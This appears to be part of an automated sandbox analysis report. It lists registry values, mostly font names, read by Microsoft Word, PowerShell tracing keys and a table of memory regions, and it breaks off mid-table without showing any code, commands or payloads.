@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F4D27
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F4D27
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 326 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
210000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
230000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
230000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
250000
|
unkown
|
page execute and read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
2899000
|
heap private
|
page read and write
|
||
6A0000
|
heap default
|
page read and write
|
||
12CC1000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
2574000
|
unkown
|
page read and write
|
||
5E7000
|
heap default
|
page read and write
|
||
3C24000
|
unkown
|
page read and write
|
||
2067000
|
unkown
|
page readonly
|
||
340000
|
heap private
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page readonly
|
||
2650000
|
unkown
|
page read and write
|
||
1E30000
|
unkown
|
page readonly
|
||
7FF000D2000
|
unkown
|
page execute and read and write
|
||
350000
|
unkown
|
page read and write
|
||
8C2000
|
heap private
|
page read and write
|
||
276D000
|
unkown
|
page read and write
|
||
180000
|
heap private
|
page read and write
|
||
231000
|
unkown
|
page execute and read and write
|
||
1B400000
|
unkown
|
page read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
440000
|
heap default
|
page read and write
|
||
9CE000
|
stack
|
page read and write
|
||
100000
|
heap default
|
page read and write
|
||
880000
|
unkown
|
page readonly
|
||
C50000
|
heap private
|
page read and write
|
||
658000
|
heap default
|
page read and write
|
||
254D000
|
unkown
|
page read and write
|
||
940000
|
heap private
|
page read and write
|
||
3614000
|
unkown
|
page read and write
|
||
10021000
|
